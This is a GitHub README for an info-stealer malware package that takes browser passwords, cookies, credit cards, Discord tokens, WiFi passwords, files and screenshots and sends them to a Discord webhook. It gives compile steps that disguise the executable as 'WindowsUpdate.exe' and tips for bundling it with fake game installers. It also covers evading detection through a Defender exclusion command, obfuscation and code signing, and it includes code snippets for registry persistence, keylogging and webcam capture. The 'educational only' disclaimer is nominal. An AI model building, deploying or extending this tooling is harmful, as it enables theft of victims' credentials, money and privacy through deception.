Skip to content

oeut/grabber

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

5 Commits
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

Coe Stealer- Complete Package

πŸ“¦ Files Included

  1. stealer.py - Main data stealing script (500+ lines)
  2. compile.py - Auto-compiler to create EXE
  3. requirements.txt - Python dependencies

🎯 What It Steals

Browser Data (Chrome/Edge/Opera/Brave)

  • βœ… Saved Passwords - All website logins
  • βœ… Cookies - Session tokens, auth cookies
  • βœ… Autofill Data - Names, addresses, emails
  • βœ… Credit Cards - Card numbers & expiry dates
  • βœ… Browsing History - Last 100 visited sites
  • βœ… Bookmarks - Saved bookmarks

Discord

  • βœ… Discord Tokens - All accounts (regular, PTB, Canary)
  • βœ… User IDs - Extracted from tokens
  • βœ… Multiple Sources - Desktop app + browser

System Information

  • βœ… IP Address - Public & local IPs
  • βœ… System Info - OS, RAM, CPU, disk usage
  • βœ… MAC Address - Hardware identifier
  • βœ… Network Interfaces - All network adapters
  • βœ… Running Processes - Active applications

WiFi

  • βœ… WiFi Passwords - All saved networks
  • βœ… SSID Names - Network names

Files

  • βœ… Desktop Files - .txt, .pdf, .doc, .png, .jpg
  • βœ… Documents Folder
  • βœ… Downloads Folder
  • βœ… File Metadata - Size, modified date

Screenshots

  • βœ… Screen Capture - Current screen state

πŸš€ Quick Start

Method 1: Auto-Compile (Recommended)

# Step 1: Install Python dependencies
pip install pyinstaller pywin32 pycryptodome psutil pyautogui

# Step 2: Run auto-compiler
python compile.py

# Select option 3 (Full setup)

This will create: dist/WindowsUpdate.exe

Method 2: Manual Compile

# Install requirements
pip install -r requirements.txt

# Compile to EXE
pyinstaller --onefile --noconsole --name=WindowsUpdate stealer.py

Method 3: Run Directly (No EXE)

pip install pywin32 pycryptodome psutil pyautogui
python stealer.py

πŸ“€ Data Delivery

All stolen data is sent to Discord webhook in multiple embeds:

  1. System Information Embed - IP, OS, RAM, CPU, etc.
  2. Discord Tokens Embed - All found tokens
  3. Passwords Embed - Website credentials
  4. Credit Cards Embed - Card details
  5. Cookies Embed - Session cookies
  6. WiFi Passwords Embed - Network credentials
  7. Browser History Embed - Recent URLs
  8. Files Embed - Found documents

Webhook Configuration

Edit stealer.py line 15:

WEBHOOK_URL = "YOUR_DISCORD_WEBHOOK_URL_HERE"

🎭 Obfuscation Tips

Rename the EXE

WindowsUpdate.exe
ChromeUpdate.exe
SecurityPatch.exe
SystemOptimizer.exe

Bundle with legitimate software

# Create installer that includes your stealer
# User runs "game_installer.exe" which:
# 1. Installs the real game
# 2. Silently runs stealer in background

Use icon

pyinstaller --icon=chrome.ico --noconsole stealer.py

πŸ”’ Detection Avoidance

Disable Windows Defender (Target Machine)

Add exclusion before running:

Add-MpPreference -ExclusionPath "C:\Users\<username>\Downloads"

Run from temporary directory

The script auto-creates temp directory and cleans up after

No persistence

Runs once, sends data, and exits (no traces)

βš™οΈ Advanced Configuration

Add Auto-Start (Persistence)

Add to stealer.py:

import winreg

def add_to_startup():
    key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,
                         r"Software\Microsoft\Windows\CurrentVersion\Run",
                         0, winreg.KEY_SET_VALUE)
    winreg.SetValueEx(key, "WindowsUpdate", 0, winreg.REG_SZ, sys.executable)
    winreg.CloseKey(key)

Add Keylogger

from pynput import keyboard

def on_press(key):
    # Log keystrokes
    pass

listener = keyboard.Listener(on_press=on_press)
listener.start()

Add Webcam Capture

import cv2

cam = cv2.VideoCapture(0)
ret, frame = cam.read()
cv2.imwrite('webcam.jpg', frame)

πŸ“Š Supported Browsers

  • βœ… Google Chrome
  • βœ… Microsoft Edge
  • βœ… Opera
  • βœ… Brave
  • βœ… Chromium-based browsers

πŸ›‘οΈ Requirements

Python Packages

  • pywin32 - Windows API access
  • pycryptodome - Decrypt Chrome data
  • psutil - System information
  • pyautogui - Screenshots

Windows Only

This stealer only works on Windows (uses Win32 APIs)

⚠️ LEGAL WARNING

THIS IS FOR EDUCATIONAL PURPOSES ONLY

Using this tool without explicit permission is:

  • ❌ Illegal in most countries
  • ❌ Violates Computer Fraud & Abuse Act (USA)
  • ❌ Violates GDPR (Europe)
  • ❌ Can result in criminal prosecution
  • ❌ Can result in civil lawsuits

Ethical Use Cases

βœ… Testing your own computer βœ… Penetration testing with written authorization βœ… Security research in controlled environment βœ… Educational demonstrations with dummy data

Illegal Use Cases

❌ Installing on someone else's computer ❌ Distributing without disclosure ❌ Using stolen data ❌ Selling the tool ❌ Harassment or blackmail

πŸ”§ Troubleshooting

"Module not found" error

pip install --upgrade pywin32 pycryptodome psutil pyautogui

"Access denied" error

Run as Administrator or add exclusions to antivirus

Webhook not receiving data

  • Check webhook URL is correct
  • Ensure internet connection active
  • Check Discord webhook limits (30 requests/minute)

EXE detected by antivirus

  • Use obfuscator: PyArmor
  • Add legitimate icon and metadata
  • Code sign the executable

πŸ“ Changelog

v2.0 (Current)

  • Added credit card extraction
  • Added WiFi password stealing
  • Added screenshot capture
  • Added file search
  • Improved Discord token extraction
  • Better error handling

v1.0

  • Basic Chrome password extraction
  • Discord token stealing
  • System information collection

For educational questions only.


Remember: With great power comes great responsibility.

Use wisely. Use legally. Use ethically.

About

a small discord token grabber made for education purpose only

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages